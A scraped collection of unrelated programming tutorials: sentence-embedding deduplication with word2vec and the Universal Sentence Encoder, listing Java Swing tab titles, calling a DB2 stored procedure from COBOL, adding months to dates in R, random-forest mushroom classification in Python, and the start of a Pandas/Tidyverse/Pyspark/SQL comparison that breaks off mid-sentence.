Now we need the cosine similarities! def cosine_similarity(list_vec1, list_vec2):'''Computing the cosine similarity between two vector representation@param list_text1 : first list of sentences@param list_text2 : second list of sentences ''' cosine_dist = [cosine(x, y) for (x, y) in zip(np.nan_to_num(list_vec1), np.nan_to_num(list_vec2))] cosine_sim = [(1 - dist) for dist in cosine_dist] return cosine_sim When I was doing this job before you, I had a bunch of jokes that were non-duplicates and few that were duplicates. Specifically, I had 385K non-duplicate pairs and 10K duplicate pairs. I plotted an AUC-ROC for this task using only the word2vec model. Nice! The curve looks real nice. (I’m omitting the confusion matrices on purpose). TPR/Recall/Sensitivity: 77%FPR: 2.2% Let’s see how the Universal Sentence Encoder fared. The area under the curve is slightly better, isn’t it? TPR/Recall/Sensitivity: 77%FPR: 2.2% Let’s see what happens when we combine them. By combine what I mean is average the cosine similarities from both the approaches and check the metrics. “An averaging ensemble of the models”. Best one so far! TPR/Recall/Sensitivity: 78.2%FPR: 1.5% Wohooo! 🎉🎉 We have a clear winner! This is one quick way of finding duplicates. No training involved, just downloading existing brilliant models and using them for your STS task! With this piece in place, you can easily build your deduplication engine. Just store all the jokes that you send to your boss’s group on the first day and then for every new incoming joke, pair them up with all the previously seen jokes and use this ensemble model to find whether they are duplicates or not. If they are, throw them away. And in this way, keep your boss’s friends happy, boss happy and get a nice paycheck and keep yourself happy :)
[ { "code": null, "e": 208, "s": 172, "text": "deduplication/diːˌdjuːplɪˈkeɪʃ(ə)n/" }, { "code": null, "e": 296, "s": 208, "text": "nounthe elimination of duplicate or redundant information, especially in computer data." }, { "code": null, "e": 365, "s": 296, "text": "\"deduplication removes the repetitive information before storing it\"" }, { "code": null, "e": 907, "s": 365, "text": "As the definition says, the task we are trying to do is to remove the duplicate texts/sentences and so on. This is nothing but the act of checking how similar the text is to one another. They can be exactly identical like: Deep Learning is Awesome! and Deep Learning is Awesome!. Or, they could be quite similar to one another in terms of what the sentence tries to convey, like: Deep Learning is Awesome! and Deep Learning is so cool. We know that these two sentences convey the same thing, and this is what we want our machines to capture." }, { "code": null, "e": 1389, "s": 907, "text": "Such a task in literature is referred to as Semantic Text Similarity(STS). It deals with determining how similar two pieces of texts are. This would include not just the syntactic similarity, that is how similar or same are the words that are used in the two sentence, but also the semantic similarity that captures the similarity in what is being conveyed using the two sentences, i.e the meaning of the text plays an important role in determining what is similar and not similar." }, { "code": null, "e": 1831, "s": 1389, "text": "The problem. Yes, that’s our main goal. To solve the problem. Let me give you an example. Say, you have to send really funny jokes (your joke could be a sentence or a bunch of sentences) to a group of people over e-mail (LOL!), and your boss asks you to make sure that people don’t receive same kind of jokes. So you have to make sure that all the jokes you have are unique and people don’t get bored with the content. What a job, seriously?" }, { "code": null, "e": 2308, "s": 1831, "text": "You, being a kick-ass coder, decide to automate this task. You have this magical API that gives you a lot of jokes for free and you write a script to mail the jokes to that group of people your boss loves. But, we can’t really trust this magical API, can we? It’s magical. What if the API gives you similar jokes? You can’t risk upsetting your boss.This is where you can use a deduplication engine that makes sure that no joke sent is similar to any that was sent in the past." }, { "code": null, "e": 2552, "s": 2308, "text": "My primary aim here is not to talk a lot about these models. But to help you use them for a practical task, something like the one that is stated above. I admit that sending jokes to people in order to impress your boss isn’t really practical." }, { "code": null, "e": 2744, "s": 2552, "text": "Let’s try to break this down into how this similarity measurement is defined and between what two entities we are trying to find the similarity (literally the text as is, or something else?)." }, { "code": null, "e": 2973, "s": 2744, "text": "Firstly, talking about the similarity measurement, there’s quite a few that can be used. Just for the sake of completeness, listing a few:1. Jaccard Similarity2. Cosine Similarity3. Earth Mover Distance4. Jensen-Shannon distance" }, { "code": null, "e": 3202, "s": 2973, "text": "But to cut to the chase, we’ll be using Cosine Similarity. Mathematically, Cosine similarity is a measure of similarity between two vectors (non-zero) of an inner product space that measures the cosine of the angle between them." }, { "code": null, "e": 3392, "s": 3202, "text": "If two documents are similar and if they are far apart in the Euclidean space, they could still be pretty close to each other. This is captured by cosine distance and hence is advantageous." }, { "code": null, "e": 3577, "s": 3392, "text": "Secondly, where do we use this cosine distance? Between pairs of sentence strings? Nope! This is were we use the power of Natural Language Processing and Deep learning. We use vectors." }, { "code": null, "e": 3802, "s": 3577, "text": "A word/sentence vector is a row of real valued numbers (as opposed to dummy numbers) where each point captures a dimension of the word’s/sentence’s meaning and where semantically similar words/sentences have similar vectors." }, { "code": null, "e": 4026, "s": 3802, "text": "And, again, there are plenty of methods to get these vectors. To name a few:Word Embedding: word2vec, GloVe, BERT word embeddings, ELMo and so on.Sentence Embedding: BERT sentence embedding, Universal Sentence Encoder, etc." }, { "code": null, "e": 4134, "s": 4026, "text": "I’ll jump straight into the methods that I personally experimented with and that worked beautifully for me." }, { "code": null, "e": 4187, "s": 4134, "text": " word2vec + Universal Sentence Encoder" }, { "code": null, "e": 4340, "s": 4187, "text": "To prevent this from being a pure implementation-oriented article (which it is intended to be), I’ll try to explain what these models are, very briefly." }, { "code": null, "e": 4702, "s": 4340, "text": "word2vec comes in two variants: Skip-Gram and Continuous Bag of Words model (CBOW). There’s plenty of material on both these variants, if you are looking for a detailed explanation. I’ll be very crisp here. The skip-gram model is a bit slower but usually does a better job with infrequent words. Hence, this is what is used often. We’ll talk briefly about this." }, { "code": null, "e": 4975, "s": 4702, "text": "You’ll find this diagram in almost every word2vec (Skip-Gram model) blog and tutorial. In this architecture, the model uses the current word to predict the surrounding window of context words. It weighs the nearby context words more heavily than the distant context words." }, { "code": null, "e": 5091, "s": 4975, "text": "Here, we look at a window of context words (2 words on each side, in this case) and try to predict the center word." }, { "code": null, "e": 5462, "s": 5091, "text": "Consider w(t) is the input word, the usual dot product between the weight matrix and the input vector w(t) is done by the single hidden layer. We apply the softmax function to the dot product between the output vector of the hidden layer and the weight matrix. This gives us the probabilities of the words that appear in the context of w(t) at the current word location." }, { "code": null, "e": 5734, "s": 5462, "text": "It’s the vectors that are present in the hidden layers that become the vector representation of that word. But these are ‘word’ embedding, and we have to find similar ‘sentences’. So, how do we get the vector representation of the sentence instead of just word embedding?" }, { "code": null, "e": 5889, "s": 5734, "text": "One simple and trivial way (the one that I will show today) is by simply averaging the word embedding of all the words of that sentence. Simple, isn’t it?" }, { "code": null, "e": 5932, "s": 5889, "text": "Now for the main part, let’s code this in." }, { "code": null, "e": 7663, "s": 5932, "text": "w2vmodel = gensim.models.KeyedVectors.load_word2vec_format('models/GoogleNews-vectors-negative300.bin.gz'), binary=True)def sent2vec(s): '''Finding word2vec vector representation of sentences @param s : sentence ''' words = str(s).lower() words = word_tokenize(words) words = [w for w in words if not w in stop_words] words = [w for w in words if w.isalpha()] featureVec = np.zeros((300,), dtype=\"float32\") nwords = 0 for w in words: try: nwords = nwords + 1 featureVec = np.add(featureVec, w2vmodel[w]) except: continue # averaging if nwords > 0: featureVec = np.divide(featureVec, nwords) return featureVecdef get_w2v_vectors(list_text1, list_text2): ‘’’Computing the word2vec vector representation of list of sentences@param list_text1 : first list of sentences@param list_text2 : second list of sentences ‘’’ print(“Computing first vectors...”) text1_vectors = np.zeros((len(list_text1), 300)) for i, q in tqdm(enumerate(list_text1)): text1_vectors[i, :] = sent2vec(q) text2_vectors = np.zeros((len(list_text2), 300)) for i, q in tqdm(enumerate(list_text2)): text2_vectors[i, :] = sent2vec(q) return text1_vectors, text2_vectors" }, { "code": null, "e": 7727, "s": 7663, "text": "That’s it! 🤷‍♂ You have your sentence embedding using word2vec." }, { "code": null, "e": 7921, "s": 7727, "text": "Google presented a series of models for encoding sentences into vectors. The authors have specifically targeted this for downstream tasks, i.e for transfer learning tasks. STS is one such task." }, { "code": null, "e": 8016, "s": 7921, "text": "It comes in two variants:1. One with a Transformer Encoder2. One with a Deep Averaging Network" }, { "code": null, "e": 8210, "s": 8016, "text": "Each of them have different design goals:1. Targets high accuracy at the cost of greater model complexity and resource consumption.2. Targets efficient inference with slightly reduced accuracy." }, { "code": null, "e": 8355, "s": 8210, "text": "I’ve hyperlinked both these architectures with my favorite blogs that explain each of them very well. Let’s focus more on how to implement them." }, { "code": null, "e": 9751, "s": 8355, "text": "usemodel = hub.Module('models/sentence_encoder')def get_use_vectors(list_text1, list_text2):'''Computing the USE vector representation of list of sentences@param list_text1 : first list of sentences@param list_text2 : second list of sentences ''' print(\"Computing second vectors...\") messages1 = list_text1 messages2 = list_text2 num_batches = math.ceil(len(messages1) / BATCH_SIZE) # Reduce logging output. tf.logging.set_verbosity(tf.logging.ERROR) message_embeddings1 = [] message_embeddings2 = [] with tf.Session() as session: session.run([tf.global_variables_initializer(), tf.tables_initializer()]) for batch in range(num_batches): print(batch * BATCH_SIZE, batch * BATCH_SIZE + BATCH_SIZE) batch_msgs1 = messages1[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE] batch_msgs2 = messages2[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE] message_embeddings1_temp, message_embeddings2_temp = session.run([usemodel(batch_msgs1), usemodel(batch_msgs2)]) message_embeddings1.append(message_embeddings1_temp) message_embeddings2.append(message_embeddings2_temp) all_embedding1 = np.concatenate(tuple(message_embeddings1)) all_embedding2 = np.concatenate(tuple(message_embeddings2)) return all_embedding1, all_embedding2" }, { "code": null, "e": 9773, "s": 9751, "text": "Again, that’s it! 🤷‍♂" }, { "code": null, "e": 9850, "s": 9773, "text": "Now we have the sentence embedding for your jokes from two different models." }, { "code": null, "e": 9887, "s": 9850, "text": "Now we need the cosine similarities!" }, { "code": null, "e": 10275, "s": 9887, "text": "def cosine_similarity(list_vec1, list_vec2):'''Computing the cosine similarity between two vector representation@param list_text1 : first list of sentences@param list_text2 : second list of sentences ''' cosine_dist = [cosine(x, y) for (x, y) in zip(np.nan_to_num(list_vec1), np.nan_to_num(list_vec2))] cosine_sim = [(1 - dist) for dist in cosine_dist] return cosine_sim" }, { "code": null, "e": 10527, "s": 10275, "text": "When I was doing this job before you, I had a bunch of jokes that were non-duplicates and few that were duplicates. Specifically, I had 385K non-duplicate pairs and 10K duplicate pairs. I plotted an AUC-ROC for this task using only the word2vec model." }, { "code": null, "e": 10610, "s": 10527, "text": "Nice! The curve looks real nice. (I’m omitting the confusion matrices on purpose)." }, { "code": null, "e": 10647, "s": 10610, "text": "TPR/Recall/Sensitivity: 77%FPR: 2.2%" }, { "code": null, "e": 10699, "s": 10647, "text": "Let’s see how the Universal Sentence Encoder fared." }, { "code": null, "e": 10754, "s": 10699, "text": "The area under the curve is slightly better, isn’t it?" }, { "code": null, "e": 10791, "s": 10754, "text": "TPR/Recall/Sensitivity: 77%FPR: 2.2%" }, { "code": null, "e": 10981, "s": 10791, "text": "Let’s see what happens when we combine them. By combine what I mean is average the cosine similarities from both the approaches and check the metrics. “An averaging ensemble of the models”." }, { "code": null, "e": 10998, "s": 10981, "text": "Best one so far!" }, { "code": null, "e": 11037, "s": 10998, "text": "TPR/Recall/Sensitivity: 78.2%FPR: 1.5%" }, { "code": null, "e": 11072, "s": 11037, "text": "Wohooo! 🎉🎉 We have a clear winner!" }, { "code": null, "e": 11216, "s": 11072, "text": "This is one quick way of finding duplicates. No training involved, just downloading existing brilliant models and using them for your STS task!" }, { "code": null, "e": 11555, "s": 11216, "text": "With this piece in place, you can easily build your deduplication engine. Just store all the jokes that you send to your boss’s group on the first day and then for every new incoming joke, pair them up with all the previously seen jokes and use this ensemble model to find whether they are duplicates or not. If they are, throw them away." } ]
Display all the titles of JTabbedPane tabs on Console in Java
To display all the titles of the JTabbedPane, let us first get the count of tabs − int count = tabbedPane.getTabCount(); Now, loop through the number of tabs in the JTabbedPane. Use the getTitleAt() to get the title of each and every tab − for (int i = 0; i < count; i++) { String str = tabbedPane.getTitleAt(i); System.out.println(str); } The following is an example to display all the titles of JTabbedPane tabs on Console − package my; import javax.swing.*; import java.awt.*; public class SwingDemo { public static void main(String args[]) { JFrame frame = new JFrame("Devices"); JTabbedPane tabbedPane = new JTabbedPane(); JTextArea text = new JTextArea(100,100); JPanel panel1, panel2, panel3, panel4, panel5, panel6, panel7, panel8; panel1 = new JPanel(); panel2 = new JPanel(); panel2.add(text); panel3 = new JPanel(); panel4 = new JPanel(); panel5 = new JPanel(); panel6 = new JPanel(); panel7 = new JPanel(); panel8 = new JPanel(); tabbedPane.setBackground(Color.blue); tabbedPane.setForeground(Color.white); tabbedPane.addTab("Laptop", panel1); tabbedPane.addTab("Desktop ", panel2); tabbedPane.addTab("Notebook", panel3); tabbedPane.addTab("Echo ", panel4); tabbedPane.addTab("Tablet", panel5); tabbedPane.addTab("Alexa ", panel6); tabbedPane.addTab("Notebook", panel7); tabbedPane.addTab("iPad", panel8); int count = tabbedPane.getTabCount(); for (int i = 0; i < count; i++) { String str = tabbedPane.getTitleAt(i); System.out.println(str); } frame.add(tabbedPane); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setSize(600,350); frame.setVisible(true); } } On runnting, the console will display all the values of the tabs −
[ { "code": null, "e": 1145, "s": 1062, "text": "To display all the titles of the JTabbedPane, let us first get the count of tabs −" }, { "code": null, "e": 1183, "s": 1145, "text": "int count = tabbedPane.getTabCount();" }, { "code": null, "e": 1302, "s": 1183, "text": "Now, loop through the number of tabs in the JTabbedPane. Use the getTitleAt() to get the title of each and every tab −" }, { "code": null, "e": 1408, "s": 1302, "text": "for (int i = 0; i < count; i++) {\n String str = tabbedPane.getTitleAt(i);\n System.out.println(str);\n}" }, { "code": null, "e": 1495, "s": 1408, "text": "The following is an example to display all the titles of JTabbedPane tabs on Console −" }, { "code": null, "e": 2857, "s": 1495, "text": "package my;\nimport javax.swing.*;\nimport java.awt.*;\npublic class SwingDemo {\n public static void main(String args[]) {\n JFrame frame = new JFrame(\"Devices\");\n JTabbedPane tabbedPane = new JTabbedPane();\n JTextArea text = new JTextArea(100,100);\n JPanel panel1, panel2, panel3, panel4, panel5, panel6, panel7, panel8;\n panel1 = new JPanel();\n panel2 = new JPanel();\n panel2.add(text);\n panel3 = new JPanel();\n panel4 = new JPanel();\n panel5 = new JPanel();\n panel6 = new JPanel();\n panel7 = new JPanel();\n panel8 = new JPanel();\n tabbedPane.setBackground(Color.blue);\n tabbedPane.setForeground(Color.white);\n tabbedPane.addTab(\"Laptop\", panel1);\n tabbedPane.addTab(\"Desktop \", panel2);\n tabbedPane.addTab(\"Notebook\", panel3);\n tabbedPane.addTab(\"Echo \", panel4);\n tabbedPane.addTab(\"Tablet\", panel5);\n tabbedPane.addTab(\"Alexa \", panel6);\n tabbedPane.addTab(\"Notebook\", panel7);\n tabbedPane.addTab(\"iPad\", panel8);\n int count = tabbedPane.getTabCount();\n for (int i = 0; i < count; i++) {\n String str = tabbedPane.getTitleAt(i);\n System.out.println(str);\n }\n frame.add(tabbedPane);\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setSize(600,350);\n frame.setVisible(true);\n }\n}" }, { "code": null, "e": 2924, "s": 2857, "text": "On runnting, the console will display all the values of the tabs −" } ]
How can a COBOL-DB2 program call a STORED PROCEDURE? Give an example.
A STORED PROCEDURE generally contains the SQLs which are often used in one or more programs. The main advantage of STORED PROCEDURE is that it reduces the data traffic between the COBOL and DB2 as the STORED PROCEDURES resides in DB2. A COBOL-DB2 program can call a STORED PROCEDURE using a CALL statement and we can have nested STORED PROCEDURE upto 16 levels. For example, if we have STORED PROCEDURE with a name ORDERSTAT, then we can call it in our COBOL-DB2 program using the below command: EXEC SQL CALL ORDERSTAT (:WS-ORDER-ID, :WS-ORDER-STATUS) END-EXEC In order to create a DB2 procedure, we can give definition as below. CREATE PROCEDURE ORDERSTAT ( IN ORDER-ID int, OUT ORDER-STAT char) We can define the STORED PROCEDURE as below. LANGUAGE SQL PROCA: BEGIN DECLARE ORDERID int; SELECT ORDER_STAT FROM ORDERS WHERE ORDER_ID = ORDERID; END P1 Below are some of the advantages of using STORED PROCEDURE. The core logic and algorithm is stored centrally at DB2 and managed by DBMS. This helps in the reusability and saves effort of modification at only a single central location. The access to the stored procedures can be restricted based on the permissions set for different profiles within DB2. The logic is executed at the database server which reduces the traffic at DB2 network and hence decreasing the overall execution time.
[ { "code": null, "e": 1297, "s": 1062, "text": "A STORED PROCEDURE generally contains the SQLs which are often used in one or more programs. The main advantage of STORED PROCEDURE is that it reduces the data traffic between the COBOL and DB2 as the STORED PROCEDURES resides in DB2." }, { "code": null, "e": 1558, "s": 1297, "text": "A COBOL-DB2 program can call a STORED PROCEDURE using a CALL statement and we can have nested STORED PROCEDURE upto 16 levels. For example, if we have STORED PROCEDURE with a name ORDERSTAT, then we can call it in our COBOL-DB2 program using the below command:" }, { "code": null, "e": 1627, "s": 1558, "text": "EXEC SQL\n CALL ORDERSTAT (:WS-ORDER-ID, :WS-ORDER-STATUS)\nEND-EXEC" }, { "code": null, "e": 1696, "s": 1627, "text": "In order to create a DB2 procedure, we can give definition as below." }, { "code": null, "e": 1763, "s": 1696, "text": "CREATE PROCEDURE ORDERSTAT ( IN ORDER-ID int,\nOUT ORDER-STAT char)" }, { "code": null, "e": 1808, "s": 1763, "text": "We can define the STORED PROCEDURE as below." }, { "code": null, "e": 1921, "s": 1808, "text": "LANGUAGE SQL\nPROCA: BEGIN\nDECLARE ORDERID int;\nSELECT ORDER_STAT FROM ORDERS\n WHERE ORDER_ID = ORDERID;\nEND P1" }, { "code": null, "e": 1981, "s": 1921, "text": "Below are some of the advantages of using STORED PROCEDURE." }, { "code": null, "e": 2156, "s": 1981, "text": "The core logic and algorithm is stored centrally at DB2 and managed by DBMS. This helps in the reusability and saves effort of modification at only a single central location." }, { "code": null, "e": 2274, "s": 2156, "text": "The access to the stored procedures can be restricted based on the permissions set for different profiles within DB2." }, { "code": null, "e": 2409, "s": 2274, "text": "The logic is executed at the database server which reduces the traffic at DB2 network and hence decreasing the overall execution time." } ]
How to add a month to a date in R?
We have to deal with date data in time series analysis, also sometimes we have a time variable in data set that is recorded to perform another type of analysis. Depending on our objective, we need to process the data and the time variable is also converted into appropriate form that we are looking for. If we want to create a sequence of months from date data then we can do it by adding a month to each upcoming month. This can be easily done by using AddMonths function of DescTools package. Installing DescTools package − install.packages("DescTools") Loading DescTools package: library(DescTools) AddMonths(as.Date('2020/01/31'), 1) [1] "2020-02-29" AddMonths(as.Date('2020/01/31'), 2) [1] "2020-03-31" AddMonths(as.Date('2020/01/31'), 3) [1] "2020-04-30" AddMonths(as.Date('2020/01/31'), 4) [1] "2020-05-31" AddMonths(as.Date('2020/01/31'), 6) [1] "2020-07-31" AddMonths(as.Date('2020/01/01'), 6) [1] "2020-07-01" AddMonths(as.Date('2020/06/01'), 6) [1] "2020-12-01" AddMonths(as.Date('2020/06/30'), 6) [1] "2020-12-30" AddMonths(as.Date('2020/01/01'), 12) [1] "2021-01-01" AddMonths(as.Date('2020/01/01'), 24) [1] "2022-01-01" AddMonths(as.Date('2020/01/01'), 36) [1] "2023-01-01" AddMonths(as.Date('2020/01/01'), 48) [1] "2024-01-01" AddMonths(as.Date('2020/01/01'), 120) [1] "2030-01-01" AddMonths(as.Date('2021/01/01'), 120) [1] "2031-01-01" AddMonths(as.Date('2021/01/01'), 500) [1] "2062-09-01" AddMonths(as.Date('2021/01/01'), 600) [1] "2071-01-01" AddMonths(as.Date('2021/01/01'), 1200) [1] "2121-01-01" AddMonths(as.Date('2021-01-01'),8) [1] "2021-09-01" AddMonths(as.Date('2021-01-01'),10) [1] "2021-11-01" AddMonths(as.Date('2021-01-01'),20) [1] "2022-09-01" AddMonths(as.Date('2021-01-01'),25) [1] "2023-02-01" AddMonths(as.Date('2021-01-01'),16) [1] "2022-05-01"
[ { "code": null, "e": 1557, "s": 1062, "text": "We have to deal with date data in time series analysis, also sometimes we have a time variable in data set that is recorded to perform another type of analysis. Depending on our objective, we need to process the data and the time variable is also converted into appropriate form that we are looking for. If we want to create a sequence of months from date data then we can do it by adding a month to each upcoming month. This can be easily done by using AddMonths function of DescTools package." }, { "code": null, "e": 1588, "s": 1557, "text": "Installing DescTools package −" }, { "code": null, "e": 2844, "s": 1588, "text": "install.packages(\"DescTools\")\nLoading DescTools package:\nlibrary(DescTools)\nAddMonths(as.Date('2020/01/31'), 1)\n[1] \"2020-02-29\"\nAddMonths(as.Date('2020/01/31'), 2)\n[1] \"2020-03-31\"\nAddMonths(as.Date('2020/01/31'), 3)\n[1] \"2020-04-30\"\nAddMonths(as.Date('2020/01/31'), 4)\n[1] \"2020-05-31\"\nAddMonths(as.Date('2020/01/31'), 6)\n[1] \"2020-07-31\"\nAddMonths(as.Date('2020/01/01'), 6)\n[1] \"2020-07-01\"\nAddMonths(as.Date('2020/06/01'), 6)\n[1] \"2020-12-01\"\nAddMonths(as.Date('2020/06/30'), 6)\n[1] \"2020-12-30\"\nAddMonths(as.Date('2020/01/01'), 12)\n[1] \"2021-01-01\"\nAddMonths(as.Date('2020/01/01'), 24)\n[1] \"2022-01-01\"\nAddMonths(as.Date('2020/01/01'), 36)\n[1] \"2023-01-01\"\nAddMonths(as.Date('2020/01/01'), 48)\n[1] \"2024-01-01\"\nAddMonths(as.Date('2020/01/01'), 120)\n[1] \"2030-01-01\"\nAddMonths(as.Date('2021/01/01'), 120)\n[1] \"2031-01-01\"\nAddMonths(as.Date('2021/01/01'), 500)\n[1] \"2062-09-01\"\nAddMonths(as.Date('2021/01/01'), 600)\n[1] \"2071-01-01\"\nAddMonths(as.Date('2021/01/01'), 1200)\n[1] \"2121-01-01\"\nAddMonths(as.Date('2021-01-01'),8)\n[1] \"2021-09-01\"\nAddMonths(as.Date('2021-01-01'),10)\n[1] \"2021-11-01\"\nAddMonths(as.Date('2021-01-01'),20)\n[1] \"2022-09-01\"\nAddMonths(as.Date('2021-01-01'),25)\n[1] \"2023-02-01\"\nAddMonths(as.Date('2021-01-01'),16)\n[1] \"2022-05-01\"" } ]
Classification with Random Forests in Python | by Sadrach Pierre, Ph.D. | Towards Data Science
The random forests algorithm is a machine learning method that can be used for supervised learning tasks such as classification and regression. The algorithm works by constructing a set of decision trees trained on random subsets of features. In the case of classification, the output of a random forest model is the mode of the predicted classes across the decision trees. In this post, we will discuss how to build random forest models for classification tasks in python. Let’s get started! For our classification task, we will be working with the Mushroom Classification data set which can be found here. We will be predicting on a binary target that specifies whether a mushroom is poisonous or edible. To start, let’s import the pandas library and read our data into a data frame: import pandas as pd df = pd.read_csv("mushrooms.csv") Let’s print the shape of our data frame: print("Shape: ", df.shape) Next, let’s print the columns in our data frame: print(df.columns) Now let’s also look at the first five rows of data using the ‘.head()’ method: print(df.head()) The attribute information is as follows We will be predicting the class for mushrooms where the possible class values are ‘e’ for edible and ‘p’ for poisonous. The next thing we will do is convert each column into machine readable categorical variables: df_cat = pd.DataFrame()for i in list(df.columns): df_cat['{}_cat'.format(i)] = df[i].astype('category').copy() df_cat['{}_cat'.format(i)] = df_cat['{}_cat'.format(i)].cat.codes Let’s print the first five rows of the resulting data frame: print(df_cat.head()) Next, let’s define our features and our targets: X = df_cat.drop('class_cat', axis = 1)y = df_cat['class_cat'] Now let’s import the random forests classifier from ‘sklearn’: from sklearn.ensemble import RandomForestClassifier Next, let’s import ‘KFold’ from the model selection module in ‘sklearn’. We will us ‘KFold’ to validate our model. Additionally, we will use the f1-score as our accuracy metric, which is the harmonic mean of the precision and recall. Let’s also initialize the “KFold” object with two splits. Finally, we’ll initialize a list that we will use to append our f1-scores: from sklearn.model_selection import KFoldkf = KFold(n_splits=2, random_state = 42)results = [] Next, let’s iterate over the indices in our data and split our data for training and testing: for train_index, test_index in kf.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] Within the for-loop we will define random forest model objects, fit to the different folds of training data, predict on the corresponding folds of test data, evaluate the f1-score at each test run and append the f1-scores to our ‘results’ list. Our model will use 100 estimators, which corresponds to 100 decision trees: for train_index, test_index in kf.split(X): ... model = RandomForestClassifier(n_estimators = 100, random_state = 24) model.fit(X_train, y_train) y_pred = model.predict(X_test) results.append(f1_score(y_test, y_pred)) Finally, let’s print the average performance of our model: print("Accuracy: ", np.mean(results)) If we increase the number of splits to 5 we have: kf = KFold(n_splits=3)...print("Accuracy: ", np.mean(results)) I’ll stop here but I encourage you to play around with the data and code yourself. To summarize, in this post we discussed how to train a random forest classification model in python. We showed how to transform categorical feature values into machine readable categorical values. Further, we showed how to split our data for training and testing, initialize our random forest model object, fit to our training data, and measure the performance of our model. I hope you found this post useful/interesting. The code in this post is available on GitHub. Thank you for reading!
[ { "code": null, "e": 646, "s": 172, "text": "The random forests algorithm is a machine learning method that can be used for supervised learning tasks such as classification and regression. The algorithm works by constructing a set of decision trees trained on random subsets of features. In the case of classification, the output of a random forest model is the mode of the predicted classes across the decision trees. In this post, we will discuss how to build random forest models for classification tasks in python." }, { "code": null, "e": 665, "s": 646, "text": "Let’s get started!" }, { "code": null, "e": 879, "s": 665, "text": "For our classification task, we will be working with the Mushroom Classification data set which can be found here. We will be predicting on a binary target that specifies whether a mushroom is poisonous or edible." }, { "code": null, "e": 958, "s": 879, "text": "To start, let’s import the pandas library and read our data into a data frame:" }, { "code": null, "e": 1012, "s": 958, "text": "import pandas as pd df = pd.read_csv(\"mushrooms.csv\")" }, { "code": null, "e": 1053, "s": 1012, "text": "Let’s print the shape of our data frame:" }, { "code": null, "e": 1080, "s": 1053, "text": "print(\"Shape: \", df.shape)" }, { "code": null, "e": 1129, "s": 1080, "text": "Next, let’s print the columns in our data frame:" }, { "code": null, "e": 1147, "s": 1129, "text": "print(df.columns)" }, { "code": null, "e": 1226, "s": 1147, "text": "Now let’s also look at the first five rows of data using the ‘.head()’ method:" }, { "code": null, "e": 1243, "s": 1226, "text": "print(df.head())" }, { "code": null, "e": 1283, "s": 1243, "text": "The attribute information is as follows" }, { "code": null, "e": 1497, "s": 1283, "text": "We will be predicting the class for mushrooms where the possible class values are ‘e’ for edible and ‘p’ for poisonous. The next thing we will do is convert each column into machine readable categorical variables:" }, { "code": null, "e": 1680, "s": 1497, "text": "df_cat = pd.DataFrame()for i in list(df.columns): df_cat['{}_cat'.format(i)] = df[i].astype('category').copy() df_cat['{}_cat'.format(i)] = df_cat['{}_cat'.format(i)].cat.codes" }, { "code": null, "e": 1741, "s": 1680, "text": "Let’s print the first five rows of the resulting data frame:" }, { "code": null, "e": 1762, "s": 1741, "text": "print(df_cat.head())" }, { "code": null, "e": 1811, "s": 1762, "text": "Next, let’s define our features and our targets:" }, { "code": null, "e": 1873, "s": 1811, "text": "X = df_cat.drop('class_cat', axis = 1)y = df_cat['class_cat']" }, { "code": null, "e": 1936, "s": 1873, "text": "Now let’s import the random forests classifier from ‘sklearn’:" }, { "code": null, "e": 1988, "s": 1936, "text": "from sklearn.ensemble import RandomForestClassifier" }, { "code": null, "e": 2355, "s": 1988, "text": "Next, let’s import ‘KFold’ from the model selection module in ‘sklearn’. We will us ‘KFold’ to validate our model. Additionally, we will use the f1-score as our accuracy metric, which is the harmonic mean of the precision and recall. Let’s also initialize the “KFold” object with two splits. Finally, we’ll initialize a list that we will use to append our f1-scores:" }, { "code": null, "e": 2450, "s": 2355, "text": "from sklearn.model_selection import KFoldkf = KFold(n_splits=2, random_state = 42)results = []" }, { "code": null, "e": 2544, "s": 2450, "text": "Next, let’s iterate over the indices in our data and split our data for training and testing:" }, { "code": null, "e": 2692, "s": 2544, "text": "for train_index, test_index in kf.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index]" }, { "code": null, "e": 3013, "s": 2692, "text": "Within the for-loop we will define random forest model objects, fit to the different folds of training data, predict on the corresponding folds of test data, evaluate the f1-score at each test run and append the f1-scores to our ‘results’ list. Our model will use 100 estimators, which corresponds to 100 decision trees:" }, { "code": null, "e": 3251, "s": 3013, "text": "for train_index, test_index in kf.split(X): ... model = RandomForestClassifier(n_estimators = 100, random_state = 24) model.fit(X_train, y_train) y_pred = model.predict(X_test) results.append(f1_score(y_test, y_pred))" }, { "code": null, "e": 3310, "s": 3251, "text": "Finally, let’s print the average performance of our model:" }, { "code": null, "e": 3348, "s": 3310, "text": "print(\"Accuracy: \", np.mean(results))" }, { "code": null, "e": 3398, "s": 3348, "text": "If we increase the number of splits to 5 we have:" }, { "code": null, "e": 3461, "s": 3398, "text": "kf = KFold(n_splits=3)...print(\"Accuracy: \", np.mean(results))" }, { "code": null, "e": 3544, "s": 3461, "text": "I’ll stop here but I encourage you to play around with the data and code yourself." } ]
Filter, Aggregate and Join in Pandas, Tidyverse, Pyspark and SQL | by Yu Zhou | Towards Data Science
One of the most popular question asked by inspiring data scientists is which language they should learn for data science. The initial choices are usually between Python and R. There are already a lot of conversations to help make a language choice (here and here). Selecting an appropriate language is the first step, but I doubt most people end up using only one language. In my personal journey, I learned R first, then SQL, then Python, and then Spark. Now in my daily work, I use all of them because I find unique advantages in each of them (in terms of speed, ease of use, visualization and others). Some people do stay in only one camp (some Python people never think about learning R), but I prefer to use what available to create my best data solutions, and speaking multiple data languages help my collaboration with different teams. As the State of Machine Learning points out, we face a challenge of supporting multiple languages in data teams, one down side of working cross languages is that I confuse one with another as they may have very similar syntax. Respecting the fact that we enjoy a data science ecosystem with multiple coexisting languages, I would love to write down three common data transformation operations in these four languages side by side, in order to shed light on how they compare at syntax level. Putting syntax side by side also helps me synergize them better in my data science toolbox. I hope it helps you as well. Data science landscape is expansive, I decide to focus on the largest common denominator in this post. Without formal statistics to back up, I take the following for granted: most data science work is on tabular data; the common data languages are SQL, Python, R and Spark (not Julia, C++, SAS and etc.). SQL has a long list of dialects (hive, mysql, postgresql, casandra and so on), I choose ANSI-standard SQL in this post. Pure Python and Base R is capable of manipulating data, however I choose Pandas for Python and Tidyverse for R in this post. Spark has RDD and Dataframe, I choose to focus on Dataframe. Spark has API in Pyspark and Sparklyr, I choose Pyspark here, because Sparklyr API is very 